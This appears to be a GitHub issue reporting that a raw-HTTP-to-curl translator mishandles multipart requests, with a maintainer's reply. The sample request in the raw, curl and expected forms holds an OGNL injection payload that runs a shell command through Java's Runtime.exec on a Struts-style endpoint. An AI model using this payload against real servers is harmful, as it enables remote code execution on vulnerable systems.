Fails with multipart request.

[ajinabraham]

Raw request

b'POST /tslwebapp/example/HelloWorld.action HTTP/1.1\r\nHost: 10.28.194.39:8080\r\nContent-Type: multipart/form-data; boundary=--------429242435\r\nContent-Length: 224\r\n\r\n----------429242435\r\nContent-Disposition: form-data; name="${#_memberAccess["allowStaticMethodAccess"]=true,@java.lang.Runtime@getRuntime().exec(\'touch /foo\')}=1"\r\n\r\n----------429242435--'

Request CURL translated by HRT

#!/usr/bin/env bash
curl --data "----------429242435Content-Disposition: form-data; name=\"${#_memberAccess[\"allowStaticMethodAccess\"]=true,@java.lang.Runtime@getRuntime().exec('touch /foo')}=1\"----------429242435--"  -v --request POST http://172.16.244.210:8000/tslwebapp/example/HelloWorld.action  --header "Host: 172.16.244.210:8000"  --header "Content-Type: multipart/form-data; boundary=--------429242435"  --header "Content-Length: 224"  --include

intercepted at proxy

POST /tslwebapp/example/HelloWorld.action HTTP/1.1
Host: 172.16.244.210:8000
User-Agent: curl/7.54.0
Accept: */*
Content-Type: multipart/form-data; boundary=--------429242435
Content-Length: 82
Connection: close

----------429242435Content-Disposition: form-data; name="0=1"----------429242435--

How it should look like

POST /tslwebapp/example/HelloWorld.action HTTP/1.1
Host: 172.16.244.210:8000
User-Agent: curl/7.54.0
Accept: */*
Content-Type :multipart/form-data; boundary=--------429242435
Content-Length: 224
Content-Type: application/x-www-form-urlencoded
Connection: close

----------429242435
Content-Disposition: form-data; name="${#_memberAccess["allowStaticMethodAccess"]=true,@java.lang.Runtime@getRuntime().exec('touch /foor')}=1"

----------429242435--

[viyatb]

@ajinabraham thanks for the report! Let me investigate this and get back over the weekend :)